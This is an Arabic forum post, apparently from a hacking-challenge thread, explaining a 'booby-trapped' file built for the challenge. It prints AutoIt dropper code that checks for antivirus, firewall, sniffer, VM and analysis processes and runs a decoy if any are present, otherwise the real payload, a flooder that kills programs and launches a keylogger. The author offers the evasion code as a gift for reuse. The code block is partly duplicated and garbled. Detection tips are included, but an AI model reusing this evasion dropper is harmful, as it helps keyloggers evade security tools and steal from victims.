
السلام عليكم ورحمة الله وبركاته
اليوم راح اشرح لكم انشاء الله طريقة كشف التلغية الثاني والثالثة
من التحديات
طبعا كلنا يعرف ماحصل في التلغيمة الثانية والثالثة
من اخطاء وذلك بسبب عملهن على هوست وهمي
لأن كنت معد التلغيمة على هوستات حقيقية لكن جائت اوامر من فوق

بتغير ذلك فأتمنى تلتمسون لنا العذر الشديد اعتذر لكل واحد واحب على راسه

بطبع كل عمل فيه اخطاء لكن اتمنى تنظرون الى الجانب المشرق
وتتركون الجانب المظلم
فقد استمتعنا بالمواضيع ولمسنا من بعض الاعضاء الحماس والخبرة ومواهب كبيرة
لم اكن اتوقع انها موجود

وليس الهدف هل كشفت التلغيمات اما لا الهدف ماتعلمنا بالمواضيع
مهمة لكل مبتدأ بكشف التلغيم وحتى للخبراء بتطوير انفسهم اكثر
وعدم الاعتماد على الطرق التلقليدية

وبصراحه اكثر استفد انا منكم وتعلمت اكثر

التلغيمة الثالثة
[ حاولت جعل الشرح فيدية لكن لم استطع بسبب اداة الفلود

طبعا التلغيمة الثالثة حاولت اجعلها اصعب مرحلة فهي كتالي
هي تعتمد على جزئين اول جزء من لغة autoit
وهو كتالي
$Kaspersky= ProcessExists("avp.exe")
$FortKnoxGUI= ProcessExists("FortKnoxGUI.exe")
$smsniff= ProcessExists("smsniff.exe")
$vmware= ProcessExists("vmware-authd.exe")
$ashmp= ProcessExists("FireWall.exe")
$Sygate= ProcessExists("smc.exe")
$ZoneAlarm= ProcessExists("VSMON.EXE ")
$Wireshark= ProcessExists("Wireshark.EXE ")
$TiGeRFirewall= ProcessExists("TiGeR-Firewall.exe")
$AntiLogger= ProcessExists("AntiLogger.exe")
$taskmgr= ProcessExists("taskmgr.exe")
$ProcessHacker= ProcessExists("ProcessHacker.exe")
$AVira= ProcessExists("avgnt.exe")
$procexp= ProcessExists("procexp.exe")
$regshot= ProcessExists("regshot.exe")
$FortKnoxGUI= ProcessExists("FortKnoxGUI.exe")
$smsniff= ProcessExists("smsniff.exe")
$vmware= ProcessExists("vmware-authd.exe")
$ashmp= ProcessExists("FireWall.exe")
$Sygate= ProcessExists("smc.exe")
$ZoneAlarm= ProcessExists("VSMON.EXE ")
$Wireshark= ProcessExists("Wireshark.EXE ")
$TiGeRFirewall= ProcessExists("TiGeR-Firewall.exe")
$AntiLogger= ProcessExists("AntiLogger.exe")
$taskmgr= ProcessExists("taskmgr.exe")
$ProcessHacker= ProcessExists("ProcessHacker.exe")
$AVira= ProcessExists("avgnt.exe")
$procexp= ProcessExists("procexp.exe")
$regshot= ProcessExists("regshot.exe")
If $Kaspersky + $procexp + $regshot + $FortKnoxGUI + $AVira + $AntiLogger + $smsniff + $vmware + $ashmp + $Sygate + $ZoneAlarm + $Wireshark +
$TiGeRFirewall = "" Then
FileInstall("ocx23.exe","d:\ocx23.exe",1)
run("d:\ocx23.exe")
Else
FileInstall("ocx33.exe","d:\ocx33.exe",1)
run("d:\ocx33.exe")
EndIf
$TiGeRFirewall = "" Then
FileInstall("ocx23.exe","d:\ocx23.exe",1)
run("d:\ocx23.exe")
Else
FileInstall("ocx33.exe","d:\ocx33.exe",1)
run("d:\ocx33.exe")
EndIf
بعدها يبدأ الشرط if
اي اذا كانت هذه البرامج موجود في البروسيس
استخرج ملف ocx23 الى d
وقم بتشغيله
طبعا ملف ocx23 وهمي

بعدها تأتي Else
اي اذا لم تكن البرامج في البروسيس
استخرج ocx33 وقم بتشغيله
وهو الحقيقي

-------------------------------------------------------
الان فهمنا الجزء المهم من التلغيمة
نبدأ الان بشرح كشفها وهو سهل جدا ولا يحتاج لتعب

طبعا كشف التلغيمة كاملة لايمكن الاعتماد على برنامج معين
لأنه بمجرد ماتعتمد على برنامج بس اضع اسمه في البروسيس
بكود الايتو ايت ويتم تخطيه لذلك اذا لن اشرح كشف التلغيمة كاملة بل
راح نختصر الى نزول الملفات بـ d
طيب يجي واحد يقول كيف اعرف انه وهمي او لا ؟؟؟
اقولك ياحبيبي لما تشوف ملف حجمه 1.7 يخرج منه ملف حجمه 500
بتأكيد بتعرف انه لازال فيه ملفات بالداخل وهي تعتمد على من يقوم بالفحص
وعلى خبرته
طيب بعد مانزلت الملفات بـ D
نفتح الملف 33
نلاحظ انه يعمل فلود يقوم بأغلاق كل البرامج التي تعمل
بعدها يعمل الكيلوجر بثواني ويغلق نفسه
طيب وش الحل ؟؟؟؟؟
الحل طال عمرك انك تسمي جدار الحماية الخاص بك بأسم msnmsgr.exe
وبل فعل جربوها الاخوان بالموضوع ونجحت
يعني لازم تغيره من مساره الاصلي ويكون عن التشغيل اسمه في البروسيس
مثلا جدار الحماية FortKnox Personal Firewall

وراح تعمل التغيمة ولم يتم عمل فلود لبرنامج FortKnox Personal Firewall
وتكشف البيانات بسهول ويتم استخراج باقي البيانات ان وجد


في الاختام اخواني احب اقول ان الكود هذا مطور من كود اخوي
جوهان فكوده يعمل على برنامج واحد وهو البروسيس
اما انا طورته ليشمل 16 برنامج ويمكن الزيادة

وهو هدية مني لكم اتمنى تقبلون اعتذاري

لتحميل الكود من هــنـــــأ
وبأذن الله راح يتم شرح التلغيمة الاولى كاملة لمحبي التلغيم

اكرر اعتذاري وانشاء الله نشوفكم بأحداث وماضيع قادمة

فـــي امـــًًًًًـــــأأأأن الله
